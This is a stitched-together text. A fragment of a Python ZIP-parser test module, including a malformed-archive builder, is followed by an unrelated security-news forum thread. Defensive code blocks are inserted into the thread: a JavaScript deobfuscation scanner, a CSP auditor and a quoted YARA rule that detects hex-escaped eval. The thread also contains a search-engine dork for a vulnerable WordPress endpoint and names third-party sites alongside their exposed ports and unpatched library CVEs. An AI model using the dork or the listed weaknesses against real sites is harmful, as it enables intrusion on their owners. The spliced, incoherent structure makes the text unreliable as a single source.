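        names.append(data[pos + CDH_LEN:pos + CDH_LEN + name_len].decode("utf-8", "replace"))
        pos += CDH_LEN + name_len + extra_len + comment_len
    return names


def is_well_formed(data):
    """Convenience wrapper: True if the archive parses, False if any check rejects it."""
    try:
        list_entries(data)
        return True
    except MalformedZip:
        return False


def build_sample_zip(comment=b""):
    """Constructed sample archive (two stored entries, optional archive comment)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("hello.txt", b"hello")
        zf.writestr("dir/notes.txt", b"constructed sample content")
        zf.comment = comment
    return buf.getvalue()


def with_bad_cd_offset(data):
    """Copy of a comment-less sample whose EOCD claims a central directory far beyond the end of
    the file; a parser that trusts that field reads out of bounds, the bug class quoted above."""
    pos = data.rfind(EOCD_SIG)
    return data[:pos + 16] + struct.pack("<I", 0xFFFFFFF0) + data[pos + 20:]
```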
-
2 million Apache web servers vulnerable through a gaping hole - possible server privilege escalation:
https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2019-0211
https://blog.rapid7.com/2019/04/03/apache-http-server-privilege-escalation-cve-2019-0211-what-you-need-to-know/
Patch, or else hackers may go for this low-hanging fruit via the excessive server info you may be spreading.
So at least go for an extra security model like SELinux, GRSecurity (a very good one), Yamato or AppArmor.
polonus (volunteer website security analyst and website error-hunter)
-
Year-Old DoS Vulnerability Allows Attacks on Some MikroTik Routers
https://www.bleepingcomputer.com/news/security/year-old-dos-vulnerability-allows-attacks-on-some-mikrotik-routers/
-
25% of Phishing Emails Bypass Office 365 Default Security
https://www.bleepingcomputer.com/news/security/25-percent-of-phishing-emails-bypass-office-365-default-security/
-
New TajMahal Cyberespionage Kit Includes 80 Malicious Modules
https://www.bleepingcomputer.com/news/security/new-tajmahal-cyberespionage-kit-includes-80-malicious-modules/
-
WPA3 Wi-Fi Standard Affected by New Dragonblood Vulnerabilities
https://www.bleepingcomputer.com/news/security/wpa3-wi-fi-standard-affected-by-new-dragonblood-vulnerabilities/
-
Google Wants To Block Potentially Risky Non-Secure Downloads
https://www.bleepingcomputer.com/news/security/google-wants-to-block-potentially-risky-non-secure-downloads/
-
New Extortion Email Threatens to Install WannaCry and DDoS Your Network
https://www.bleepingcomputer.com/news/security/new-extortion-email-threatens-to-install-wannacry-and-ddos-your-network/
Check the post before repeating information.
https://forum.avast.com/index.php?topic=52252.msg1501600#msg1501600
-
Threat Group Uses Pastebin, GitHub In SneakyPastes Operation
https://www.bleepingcomputer.com/news/security/threat-group-uses-pastebin-github-in-sneakypastes-operation/
-
Popular Yuzo WordPress Plugin Exploited to Redirect Users to Scams
https://www.bleepingcomputer.com/news/security/popular-yuzo-wordpress-plugin-exploited-to-redirect-users-to-scams/
-
Office 365 Team Discovers Phishing Email Pushing WinRAR Exploit
https://www.bleepingcomputer.com/news/security/office-365-team-discovers-phishing-email-pushing-winrar-exploit/
-
VSDC Site Hacked Again to Spread Password Stealing Malware
https://www.bleepingcomputer.com/news/security/vsdc-site-hacked-again-to-spread-password-stealing-malware/
-
Hyperlink Auditing Pings Being Used to Perform DDoS Attacks
https://www.bleepingcomputer.com/news/security/hyperlink-auditing-pings-being-used-to-perform-ddos-attacks/
-
@ Snake,
Please don't turn this into a mirror of bleeping computers.
Flooding this forum with their security posts isn't exactly doing anything for this forum.
-
@ Snake,
Please don't turn this into a mirror of bleeping computers.
Flooding this forum with their security posts isn't exactly doing anything for this forum.
Ok.
-
'NamPoHyu Virus' Ransomware Targets Remote Samba Servers
https://www.bleepingcomputer.com/news/security/nampohyu-virus-ransomware-targets-remote-samba-servers/
-
Vulnerability in Multiple VPN Applications
https://www.us-cert.gov/ncas/current-activity/2019/04/12/Vulnerability-Multiple-VPN-Applications
https://kb.cert.org/vuls/id/192371/
-
Vulnerability in Multiple VPN Applications
https://www.us-cert.gov/ncas/current-activity/2019/04/12/Vulnerability-Multiple-VPN-Applications
https://kb.cert.org/vuls/id/192371/
The only question I have: does this affect SecureLine and/or HMA (Hide My Ass)?
-
Vulnerability in Multiple VPN Applications
https://www.us-cert.gov/ncas/current-activity/2019/04/12/Vulnerability-Multiple-VPN-Applications
https://kb.cert.org/vuls/id/192371/
The only question I have: does this affect SecureLine and/or HMA (Hide My Ass)?
Hi Bob, no - check the second link for details.
-
Vulnerability in Multiple VPN Applications
https://www.us-cert.gov/ncas/current-activity/2019/04/12/Vulnerability-Multiple-VPN-Applications
https://kb.cert.org/vuls/id/192371/
The only question I have: does this affect SecureLine and/or HMA (Hide My Ass)?
Hi Bob, no - check the second link for details.
Avast has acknowledged that their products aren't affected. Thanks
-
L.S.
Cisco and dozens of organizations fell victim to DNS hijacking:
Read about this abuse: https://blog.talosintelligence.com/2019/04/seaturtle.html
and on how DNS settings are being changed by attackers:
https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html
An earlier warning:
https://www.us-cert.gov/ncas/current-activity/2019/01/10/DNS-Infrastructure-Hijacking-Campaign
(warnings by the Department of Homeland Security)
polonus
-
Researcher Took Control of Microsoft's Live Tile Service, Defacement PoC Demoed
https://www.bleepingcomputer.com/news/security/researcher-took-control-of-microsofts-live-tile-service-defacement-poc-demoed/
-
Point Blank Gamers Targeted with Backdoor Malware
https://threatpost.com/gamers-pointblank-backdoor-malware/144088/
-
Hundreds of GoDaddy Accounts Used for "Miracle" Product Scams
https://www.bleepingcomputer.com/news/security/hundreds-of-godaddy-accounts-used-for-miracle-product-scams/
-
Vulnerable Confluence Servers Get Infected with Ransomware, Trojans
https://www.bleepingcomputer.com/news/security/vulnerable-confluence-servers-get-infected-with-ransomware-trojans/
GitHub-Hosted Magecart Card Skimmer Found on Hundreds of Stores
https://www.bleepingcomputer.com/news/security/github-hosted-magecart-card-skimmer-found-on-hundreds-of-stores/
-
Docker Hub Database Hack Exposes Sensitive Data of 190K Users
https://www.bleepingcomputer.com/news/security/docker-hub-database-hack-exposes-sensitive-data-of-190k-users/ (https://www.bleepingcomputer.com/news/security/docker-hub-database-hack-exposes-sensitive-data-of-190k-users/)
-
I have been going on in Viruses and Worms about the insecurity of the WordPress CMS, which is based on PHP,
especially about how vulnerable plug-ins of the website software can be exploited by malcreants.
A new one, in a series of some 243 attacks over the latter years, is the Multi-Vector Attack in Server Logs,
read: https://labs.sucuri.net/?note=2019-03-25
Just too many results for this one; only 11 exploitables reported:
dork query //websites/GET+%2Fwp-admin%2Fadmin-post.php%3Fswp_debug%3Dload_options%26swp_url%3D/
detected -https://www.prensafutbol.cl/ -> Outdated software detected:
https://sitecheck.sucuri.net/results/https/www.prensafutbol.cl
= a high risk site with vulnerable mixed content!
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Read about the issue from Johannes Pille and others here: https://wordpress.stackexchange.com/questions/69549/define-wp-debug-conditionally-for-admins-only-log-errors-append-query-arg-f/69552
polonus
-
Europeans Hit with Multi-Stage Malware Loader via Signed Malspam
https://www.bleepingcomputer.com/news/security/europeans-hit-with-multi-stage-malware-loader-via-signed-malspam/ (https://www.bleepingcomputer.com/news/security/europeans-hit-with-multi-stage-malware-loader-via-signed-malspam/)
-
Urgent request to 60.000 vulnerable WordPress webshops to update a plug-in
and disable a specific non-patched plug-in for the time being:
Immediately install: https://wordpress.org/support/topic/upgrade-to-4-3/
The plug-in involved that should be upgraded:
https://wordpress.org/plugins/woocommerce-checkout-manager/
Read on that particular attack campaign: https://labs.sucuri.net/?note=2019-03-25
WordPress core software, when fully patched and not outdated, is rather secure,
and comes checked by developers that maintain the code.
When configuring, mind to set user enumeration to disabled as well as directory listing to disabled,
and see to it that all your links are Google Safe Browsing OK-ed.
WordPress plug-ins should also be treated with extra care: keep them fully updated,
and remove the risky ones and certainly those abandoned by their developers,
as they won't get updates and in due time will form a grave risk
to website owners/admins, hosting parties and end-users alike.
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Update. From 13.30 hrs. to-day CET the developer came up with a new updated version 4.3.
Damian
-
The inception bar: a new phishing method
https://jameshfisher.com/2019/04/27/the-inception-bar-a-new-phishing-method/
https://9to5google.com/2019/04/28/chrome-android-exploit-fake-address-bar/
-
$1.75 Million Stolen by Crooks in Church BEC Attack
https://www.bleepingcomputer.com/news/security/175-million-stolen-by-crooks-in-church-bec-attack/
-
Report: Unknown Data Breach Exposes 80 Million US Households
https://www.vpnmentor.com/blog/report-millions-homes-exposed/
-
New Sodinokibi Ransomware Delivered via Oracle WebLogic Flaw
https://www.securityweek.com/new-sodinokibi-ransomware-delivered-oracle-weblogic-flaw
-
Oracle WebLogic servers under attack from ransomware since the 25th of April.
Patch available from April 26th onward,
Re: https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html
Patch and upgrade a.s.a.p.
polonus
-
Burger King leaked the data of 38.000 customers through an unprotected, publicly available Elasticsearch database:
Read: https://securitydiscovery.com/burger-kings-online-shop-for-kids-exposed-data/ (source Bob Diachenko).
Example of a resource that has adequate protection:
http://156.235.224.95/ with protected Elasticsearch, with password protection on log-in
or protected through Kibana. See: https://www.elastic.co/guide/en/x-pack/current/elasticsearch-security.html
That is the least Burger King customers should expect there to be.
Now there are handy little specific search scripts to be used on Shodan, like LeakLooker,
to find unprotected open MongoDB, CouchDB and Elasticsearch databases.
However, even when a website contains unprotected open resources,
intruders may not visit such unprotected Elasticsearch databases to access them;
that is illegal and punishable conduct.
"When you see some veranda doors open at the porch, this does not mean it is an invitation to enter".
Good that Bob Diachenko disclosed this situation.
On the other hand it is a shame for Burger King to have such unprotected open databases in the first place.
The database has now been adequately protected.
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
Local Authorities in Texas and Maryland Hit by Ransomware
https://www.bleepingcomputer.com/news/security/local-authorities-in-texas-and-maryland-hit-by-ransomware/ (https://www.bleepingcomputer.com/news/security/local-authorities-in-texas-and-maryland-hit-by-ransomware/)
-
Dharma Ransomware Uses Legit Antivirus Tool To Distract Victims
https://www.bleepingcomputer.com/news/security/dharma-ransomware-uses-legit-antivirus-tool-to-distract-victims/ (https://www.bleepingcomputer.com/news/security/dharma-ransomware-uses-legit-antivirus-tool-to-distract-victims/)
-
Thousands of webshops leak customer data:
https://publicwww.com/websites/%22assets.pcrl.co%22/
polonus
-
All 3rd parties involved and why a transaction was not realized: https://www.mupload.nl/img/fqxx4rszg0.jpg
Is src=//assets.pcrl.co/js/jstracker.min.js meant to denote that the webshop JavaScript could be compromised?
See: -https://github.com/LinusHenze/WebKit-RegEx-Exploit
PHP based CMS with manipulated JavaScript is lively dangerous,
Example: https://www.virustotal.com/#/file/48eb8b500ae6a38617b5738d2b3faec481922a7782246e31d2755c034a45cd5d/community
re: https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=XiNuLmd7fH1wfHR9XWwuXl1t~enc
polonus
-
Hackers Inject Magecart Card Skimmer in Forbes’ Subscription Site
https://www.bleepingcomputer.com/news/security/hackers-inject-magecart-card-skimmer-in-forbes-subscription-site/ (https://www.bleepingcomputer.com/news/security/hackers-inject-magecart-card-skimmer-in-forbes-subscription-site/)
-
The latest cybercriminal trend next to ransomware is third-party (obfuscated) JavaScript injection by malcreants to get at victim data,
so-called form jacking:
Read: https://news.netcraft.com/archives/2019/05/14/french-jewellery-chain-cleor-falls-victim-to-skimming-attack.html
The attackers operate from a typosquatted domain and extract user data from signing-out pay pages,
which are being sent to a server under their control.
SRI & CSP and other security header installs can greatly protect against such attacks.
One should also scan and validate: https://github.com/gwillem/magento-malware-scanner
But other scanning should also be brought in next to regular-expression rule scanning, like
snippet
rule obfuscated_eval {
    strings:
        // "eval" written as hex escapes (\x65\x76\x61\x6c), with optional whitespace in between
        $ = /\\x65\s*\\x76\s*\\x61\s*\\x6c/
    condition:
        any of them
}
end snippet (see https://pastebin.com/aUuN7v7S)
Source: willemg, 88 lines in all.
See what a good PHP scanner script should be up against: https://pastebin.com/aUuN7v7S
and what you need beside this to deobfuscate, e.g.:
http://ddecode.com/hexdecoder/?results=82d5a427fa502e3a5652e15a9602da48
So protection can be had, when security is not a last-resort thing and a sort of low-level robots.txt-like affair :o
polonus (volunteer 3rd party cold reconnaissance website analyst and website error hunter)
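The rule quoted above only catches "eval" spelled as hex escapes. As an added example (not code from the post, nor from gwillem's magento-malware-scanner), the Python below mirrors that regex and goes one step further, as a deobfuscation tool like the hex decoder linked above would: it undoes \xNN / \uNNNN escapes and String.fromCharCode() calls, then reports names such as eval or document.write that are only visible after decoding. The two JavaScript samples are constructed for the demonstration and are not taken from any real site.

```python
import re

# Equivalent of the YARA string quoted in the post: the characters e, v, a, l
# written as JavaScript hex escapes, with optional whitespace between them.
HEX_EVAL = re.compile(r"\\x65\s*\\x76\s*\\x61\s*\\x6c", re.IGNORECASE)

# Escape forms accepted inside JavaScript string literals.
_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")
# String.fromCharCode(101, 118, 97, 108) evaluates to "eval".
_FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]+?)\s*\)")

# Names that are harmless in plain source but telling when they only become
# visible after the escapes have been undone.
WATCHED = ("eval", "Function", "document.write", "unescape", "atob")


def decode_js_escapes(text: str) -> str:
    """Replace \\xNN and \\uNNNN escapes with the characters they denote."""
    return _ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def decode_fromcharcode(text: str) -> str:
    """Replace String.fromCharCode(n, n, ...) with the quoted string it builds."""
    def repl(m):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        return '"' + "".join(chr(c) for c in codes) + '"'
    return _FROMCHARCODE.sub(repl, text)


def deobfuscate(text: str) -> str:
    """Apply both decoders repeatedly; decoded text may itself contain escapes."""
    for _ in range(5):
        decoded = decode_fromcharcode(decode_js_escapes(text))
        if decoded == text:
            break
        text = decoded
    return text


def _watched_names(text: str) -> set:
    return {name for name in WATCHED
            if re.search(r"\b" + re.escape(name) + r"\b", text)}


def scan_js(source: str) -> list:
    """Return human-readable findings for one JavaScript source text."""
    findings = []
    if HEX_EVAL.search(source):
        findings.append("hex-escaped eval (YARA rule match)")
    # Names present only after decoding were deliberately hidden by the author.
    hidden = _watched_names(deobfuscate(source)) - _watched_names(source)
    for name in sorted(hidden):
        findings.append(f"'{name}' appears only after decoding escapes")
    return findings


# Constructed samples, not taken from any real site.
BENIGN = 'var n = cart.items.length; document.getElementById("count").textContent = n;'
OBFUSCATED = ('var k = "\\x65\\x76\\x61\\x6c"; '
              'window[k](String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101));')

if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("obfuscated", OBFUSCATED)):
        print(label, scan_js(src) or "clean")
```

Running it reports nothing for the benign snippet and three findings for the obfuscated one: the YARA-style match plus eval and document.write surfacing only after decoding. Decoding before matching is what makes the difference; a plain regex on the raw text would never see the document.write hidden in the fromCharCode call.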
-
L.S.
And why has CSP not been correctly installed all over the cloud at Cloudflare's,
now that form-jacking gains more and more momentum?
Re: https://observatory.mozilla.org/analyze/cdnjs.cloudflare.com
A minimal D status is a shame really.
"Content Security Policy (CSP) implemented unsafely.
This includes 'unsafe-inline' or data: inside script-src, overly broad sources such as
https: inside object-src or script-src, or not restricting the sources for object-src or script-src."
And here Cloudflare cannot do better than comin' up with a meagre C grade,
See: https://tls.imirhil.fr/https/cdnjs.cloudflare.com
They won't go that extra security mile for their end-users, just implementing
what they can get away with, I presume?
This will mean that we won't see that last webshop being hacked by form-jacking attackers there soon,
that's for sure. A shame really, isn't it?
polonus (volunteer 3rd party cold reconnaissance website security analyst and error-hunter)
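The unsafe patterns listed in the post are mechanical to check. The following Python is an added example (not the Observatory's code and not from the post) that parses a Content-Security-Policy header and reports exactly those patterns for script-src and object-src, including the fallback to default-src when a directive is absent. The three policies are constructed for the demonstration; they are not the headers of any real host.

```python
# Directives that fall back to default-src when they are not set explicitly.
FETCH_DIRECTIVES = ("script-src", "object-src")
BROAD_SOURCES = ("*", "https:", "http:")


def parse_csp(header: str) -> dict:
    """Split a Content-Security-Policy header into {directive: [sources]}."""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def effective_sources(policy: dict, directive: str):
    """Sources that actually govern `directive`, honouring default-src fallback.
    Returns None when neither the directive nor default-src is present."""
    if directive in policy:
        return policy[directive]
    return policy.get("default-src")


def audit_csp(header: str) -> list:
    """Report the unsafe patterns quoted in the post for script-src and object-src."""
    issues = []
    policy = parse_csp(header)
    for directive in FETCH_DIRECTIVES:
        sources = effective_sources(policy, directive)
        if sources is None:
            issues.append(f"{directive} is not restricted (no {directive} and no default-src)")
            continue
        lowered = [s.lower() for s in sources]
        if directive == "script-src":
            # A nonce or hash in script-src makes CSP2+ browsers ignore
            # 'unsafe-inline'; this check reports it either way.
            if "'unsafe-inline'" in lowered:
                issues.append("'unsafe-inline' in script-src")
            if "data:" in lowered:
                issues.append("data: in script-src")
        for broad in BROAD_SOURCES:
            if broad in lowered:
                issues.append(f"overly broad source {broad} in {directive}")
    return issues


# Constructed policies for the demonstration, not the headers of any real host.
WEAK = "default-src 'self'; script-src 'self' 'unsafe-inline' https: data:"
UNRESTRICTED = "script-src 'self'"
STRICT = ("default-src 'none'; script-src 'self' https://cdnjs.cloudflare.com; "
          "object-src 'none'; base-uri 'none'; frame-ancestors 'none'")

if __name__ == "__main__":
    for label, header in (("weak", WEAK), ("unrestricted", UNRESTRICTED), ("strict", STRICT)):
        print(label, audit_csp(header) or "no issues")
```

The second policy looks harmless at a glance, yet it leaves object-src wide open because there is no default-src to fall back on; that is the "not restricting the sources for object-src" case from the quoted grading text.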
-
Needed now: a Let's Encrypt transparency log?
-> read https://www.theregister.co.uk/2019/05/15/lets_encrypt_ct_log/
Will it make a big difference with malcreants?
pol
-
It's everywhere. Data collection!
https://www.cnn.com/2019/05/20/politics/dhs-chinese-drone-warning/index.html (https://www.cnn.com/2019/05/20/politics/dhs-chinese-drone-warning/index.html)
-
Google Stored Unhashed G Suite Passwords for Over a Decade
https://www.bleepingcomputer.com/news/security/google-stored-unhashed-g-suite-passwords-for-over-a-decade/
https://cloud.google.com/blog/products/g-suite/notifying-administrators-about-unhashed-password-storage
-
Sectigo Responds to Chronicle's Report About Malware Signed by Their Certs
https://www.bleepingcomputer.com/news/security/sectigo-responds-to-chronicles-report-about-malware-signed-by-their-certs/ (https://www.bleepingcomputer.com/news/security/sectigo-responds-to-chronicles-report-about-malware-signed-by-their-certs/)
-
Notice of Security Incident
https://about.flipboard.com/support-information-incident-may-2019/
-
YouTube Cryptocurrency Videos Pushing Info-Stealing Trojan
https://www.bleepingcomputer.com/news/security/youtube-cryptocurrency-videos-pushing-info-stealing-trojan/
-
YouTube Cryptocurrency Videos Pushing Info-Stealing Trojan
https://www.bleepingcomputer.com/news/security/youtube-cryptocurrency-videos-pushing-info-stealing-trojan/ (https://www.bleepingcomputer.com/news/security/youtube-cryptocurrency-videos-pushing-info-stealing-trojan/)
This scam is the same as most and promises something for nothing. (Bitcoins)
It usually works on those that are greedy and doesn't work on us rational and cautious types. :)
-
ShadowHammer: Malicious updates for ASUS laptops
https://www.kaspersky.com/blog/shadow-hammer-teaser/26149/
https://securelist.com/operation-shadowhammer/89992/
https://www.virustotal.com/gui/file/bebb16193e4b80f4bc053e4fa818aa4e2832885392469cd5b8ace5cec7e4ca19/detection
-
Maze Ransomware Says Computer Type Determines Ransom Amount
https://www.bleepingcomputer.com/news/security/maze-ransomware-says-computer-type-determines-ransom-amount/ (https://www.bleepingcomputer.com/news/security/maze-ransomware-says-computer-type-determines-ransom-amount/)
-
GandCrab Ransomware Shutting Down After Claiming to Earn $2.5 Billion
https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/ (https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/)
-
BlackSquid Uses 7 Exploits to Infect Web Servers with Miners
https://www.bleepingcomputer.com/news/security/blacksquid-uses-7-exploits-to-infect-web-servers-with-miners/ (https://www.bleepingcomputer.com/news/security/blacksquid-uses-7-exploits-to-infect-web-servers-with-miners/)
-
Windows 10 Apps Hit by Malicious Ads that Blockers Won't Stop
https://www.bleepingcomputer.com/news/security/windows-10-apps-hit-by-malicious-ads-that-blockers-wont-stop/
-
Windows 10 Apps Hit by Malicious Ads that Blockers Won't Stop
https://www.bleepingcomputer.com/news/security/windows-10-apps-hit-by-malicious-ads-that-blockers-wont-stop/ (https://www.bleepingcomputer.com/news/security/windows-10-apps-hit-by-malicious-ads-that-blockers-wont-stop/)
Simple solution: do not install ad-supported apps.
-
AMCA Breach Hits 12 Million Quest Diagnostics Patients
https://www.securityweek.com/amca-breach-hits-12-million-quest-diagnostics-patients (https://www.securityweek.com/amca-breach-hits-12-million-quest-diagnostics-patients)
-
AMCA Breach Hits 12 Million Quest Diagnostics Patients
https://www.securityweek.com/amca-breach-hits-12-million-quest-diagnostics-patients (https://www.securityweek.com/amca-breach-hits-12-million-quest-diagnostics-patients)
Good thing my insurance co. doesn't cover Quest, so I avoided this one. :)
-
Cryptojacking campaign strikes China with fileless attacks
https://www.zdnet.com/article/cryptojacking-campaign-strikes-china-with-fileless-attacks/ (https://www.zdnet.com/article/cryptojacking-campaign-strikes-china-with-fileless-attacks/)
-
Wajam: From start-up to massively-spread adware
https://www.welivesecurity.com/2019/06/05/wajam-startup-massively-spread-adware/ (https://www.welivesecurity.com/2019/06/05/wajam-startup-massively-spread-adware/)
-
New GoldBrute Botnet is Trying to Hack 1.5 Million RDP Servers
https://www.bleepingcomputer.com/news/security/new-goldbrute-botnet-is-trying-to-hack-15-million-rdp-servers/ (https://www.bleepingcomputer.com/news/security/new-goldbrute-botnet-is-trying-to-hack-15-million-rdp-servers/)
-
New GoldBrute Botnet is Trying to Hack 1.5 Million RDP Servers
https://www.bleepingcomputer.com/news/security/new-goldbrute-botnet-is-trying-to-hack-15-million-rdp-servers/ (https://www.bleepingcomputer.com/news/security/new-goldbrute-botnet-is-trying-to-hack-15-million-rdp-servers/)
It's hard to be first. https://forum.avast.com/index.php?topic=66267.msg1508386#msg1508386
:)
-
New Extortion Scam Threatens to Ruin a Website's Reputation
https://www.bleepingcomputer.com/news/security/new-extortion-scam-threatens-to-ruin-a-websites-reputation/ (https://www.bleepingcomputer.com/news/security/new-extortion-scam-threatens-to-ruin-a-websites-reputation/)
-
Major HSM vulnerabilities impact banks, cloud providers, governments
https://www.zdnet.com/article/major-hsm-vulnerabilities-impact-banks-cloud-providers-governments/ (https://www.zdnet.com/article/major-hsm-vulnerabilities-impact-banks-cloud-providers-governments/)
-
WordPress Chat Plugin Bug Lets Hackers Inject Text, Steal Logs
https://www.bleepingcomputer.com/news/security/wordpress-chat-plugin-bug-lets-hackers-inject-text-steal-logs/ (https://www.bleepingcomputer.com/news/security/wordpress-chat-plugin-bug-lets-hackers-inject-text-steal-logs/)
-
RAMBleed Attack Can Steal Sensitive Data From Computer Memory
https://www.bleepingcomputer.com/news/security/rambleed-attack-can-steal-sensitive-data-from-computer-memory/ (https://www.bleepingcomputer.com/news/security/rambleed-attack-can-steal-sensitive-data-from-computer-memory/)
Bad Cert Vulnerability Can Bring Down Any Windows Server
https://www.bleepingcomputer.com/news/security/bad-cert-vulnerability-can-bring-down-any-windows-server/ (https://www.bleepingcomputer.com/news/security/bad-cert-vulnerability-can-bring-down-any-windows-server/)
New Version of ShellTea Backdoor Used by FIN8 Hacking Group
https://www.securityweek.com/new-version-shelltea-backdoor-used-fin8-hacking-group (https://www.securityweek.com/new-version-shelltea-backdoor-used-fin8-hacking-group)
-
Important to have proper back-end security on Magento webshop sites,
hundreds of which have been compromised lately:
https://sansec.io/labs/2019/05/10/magento-2-hacks/
because the cybercriminals automated these hacks to quite an extent:
https://twitter.com/gwillem/status/1138818632409145344
In such cases it is best to have additional security measures taken,
cloud hosting and hiding your back-end from attackers,
an example: cloudflare//support.coudflare.com -> http://sitemeer.com/# HTTPS://www.interviewcoder: in 8443
IP 83.217.93.87: 8080 or 8880 https app deployment on Cloudflare,
in this case check shodan.io not for weaknesses but instead for stabler security (pol)
website: https://hairsuite.nl:8443
Found retirable jQuery libraries: Retire.js
jquery-ui-dialog 1.10.4 Found in -https://hairsuite.nl:8443/static/version1559290779/base/Magento/base/default/jquery/jquery-ui.js
Vulnerability info:
High CVE-2016-7103 281 XSS Vulnerability on closeText option 123
jquery 1.12.4 Found in -https://hairsuite.nl:8443/static/version1559290779/base/Magento/base/default/jquery/jquery.min.js
Vulnerability info:
Medium 2432 3rd party CORS request may execute CVE-2015-9251 1234
Medium CVE-2015-9251 11974 parseHTML() executes scripts in event handlers 123
Medium CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution
Compare: https://www.magereport.com/scan/?s=https://hairsuite.nl:s/
outside of the store not much to be scanned
Security Checks for -https://hairsuite.nl
(3) Susceptible to man-in-the-middle attacks
Vulnerable to cross-site attacks
DNS is susceptible to man-in-the-middle attacks
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
Fake news or real existing cyber-threat against the Russian astralinux-grid?
http://wiki.dataved.ru/6/h/t -> https://scaner-vs.ru/version-for-testing/
part of threats described at:
https://download.geo.drweb.com/pub/drweb/unix/workstation/11.1/documentation/html/en/index.html?dw_8_app_a_threat_types.htm
vim exploitable - http://download.astralinux.ru/astra/stable/orel/repository/pool/main/v/vim/
https://www.cybersecurity-review.com/news-june-2019/your-linux-can-get-hacked-just-by-opening-a-file-in-vim-or-neovim-editor/
https://www.reddit.com/r/vim/comments/bwp7q3/code_execution_vulnerability_in_vim_811365_and/
source credits go out to: luntrus
Consider also: https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md
Patches: https://github.com/vim/vim/commit/5357552 & https://github.com/neovim/neovim/pull/10082
Beyond patching, it's recommended to disable modelines in the vimrc (set nomodeline), to use the securemodelines plugin, or to disable modelineexpr (since patch 8.1.1366, Vim-only) to disallow expressions in modelines.
Check if you have modelines enabled by opening vim and entering
:set modeline?
If vim returns nomodeline, you are not vulnerable.
If you are vulnerable or want to ensure your security with this issue, add these lines to your vimrc:
set modelines=0
set nomodeline
quote credits go to Arminias (@rawsec)
polonus (volunteer 3rd party cold reconnaissance website security analyst & website error-hunter)
-
Kaspersky about OS hardening and steering away recently from Microsoft to Astralinux...
Read: https://securelist.com/features-of-secure-os-realization/77469/
To improve security, tools that make it more difficult to exploit some vulnerabilities,
including those inherent in the system due to its insecure original design, can be built into the system.
Examples include: Grsecurity, AppArmor, Hardened Gentoo, Atlix, YANUX, and Astra Linux, etc.
Weird that none of the MS evangelists here react, well, in this respect.
Why may the Russian Federation have taken such actions to harden their grid base,
switching from MS Windows towards military-strength Astra Linux for their critical systems?
Seems the world again comes "split in two, or maybe three or four" (Anglo-US, EU, Russian Federation, Mainland China).
Remember the song lyrics: "The Russian spy and I, we both wonder why, the world is split in two"?
polonus
-
DanaBot Banking Trojan Upgraded with ‘Non Ransomware’ Module
https://www.bleepingcomputer.com/news/security/danabot-banking-trojan-upgraded-with-non-ransomware-module/ (https://www.bleepingcomputer.com/news/security/danabot-banking-trojan-upgraded-with-non-ransomware-module/)
Turla Espionage Group Hacks OilRig APT Infrastructure
https://www.bleepingcomputer.com/news/security/turla-espionage-group-hacks-oilrig-apt-infrastructure/ (https://www.bleepingcomputer.com/news/security/turla-espionage-group-hacks-oilrig-apt-infrastructure/)
Ryuk Ransomware Adds IP and Computer Name Blacklisting
https://www.bleepingcomputer.com/news/security/ryuk-ransomware-adds-ip-and-computer-name-blacklisting/ (https://www.bleepingcomputer.com/news/security/ryuk-ransomware-adds-ip-and-computer-name-blacklisting/)
Desjardins Group Data Leak Exposes Info of 2.9 Million Members
https://www.bleepingcomputer.com/news/security/desjardins-group-data-leak-exposes-info-of-29-million-members/ (https://www.bleepingcomputer.com/news/security/desjardins-group-data-leak-exposes-info-of-29-million-members/)
-
U.S. Government Warns of Data Wipers Used in Iranian Cyberattacks
https://www.bleepingcomputer.com/news/security/us-government-warns-of-data-wipers-used-in-iranian-cyberattacks/
-
OPERATION SOFT CELL: A WORLDWIDE CAMPAIGN AGAINST TELECOMMUNICATIONS PROVIDERS
https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers
https://www.theregister.co.uk/2019/06/25/global_telcos_hacked/
https://techcrunch.com/2019/06/24/hackers-cell-networks-call-records-theft/?guccounter=1&guce_referrer_us=aHR0cHM6Ly93d3cuZGlnaS5uby9hcnRpa2xlci9hdnNsb3J0ZS1tYXNzaXYtaGFja2Vya2FtcGFuamUtbW90LWVuLXJla2tlLW1vYmlsb3BlcmF0b3Jlci80Njg1MDg&guce_referrer_cs=wYDG-7wEeaqSkqtSwJ2RvQ
-
Where address obscurity was meant to be your security for public buckets.
Read: https://www.upguard.com/breaches/attunity-data-leak
So no longer secure as there are search engines now to find these public buckets,
which could otherwise come without protection: https://buckets.grayhatwarfare.com/
Really some insecurity lingers on the Interwebz, folks, it sure does.
Some search example for bootstrap.js:
https://buckets.grayhatwarfare.com/results/bootstrap.js
And some results are not secure: -https://tempdev.s3-us-west-2.amazonaws.com/assets/bower_components/bootstrap/dist/js/bootstrap.js
Detected libraries:
bootstrap - 3.3.7 : -https://tempdev.s3-us-west-2.amazonaws.com/assets/bower_components/bootstrap/dist/js/bootstrap.js
Info: Severity: high
https://github.com/twbs/bootstrap/issues/28236
Info: Severity: medium
https://github.com/twbs/bootstrap/issues/20184
